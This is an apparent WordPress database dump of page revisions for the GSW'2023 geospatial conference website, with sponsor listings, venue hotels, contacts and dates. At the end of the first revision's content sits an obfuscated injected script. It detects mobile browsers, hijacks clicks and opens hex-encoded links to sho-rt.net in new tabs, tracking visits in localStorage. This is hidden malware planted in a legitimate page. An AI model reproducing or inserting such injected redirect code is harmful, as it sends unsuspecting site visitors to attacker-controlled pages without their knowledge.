Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 20:50:11','2023-06-13 20:50:11','',3066,'https://gsw2023.com/?p=4678',0,'revision','',0),
(4679,1,'2023-06-13 20:52:21','2023-06-13 20:52:21','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Camera ready paper submission: July 15, 2023 </strong></li>\n<li><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 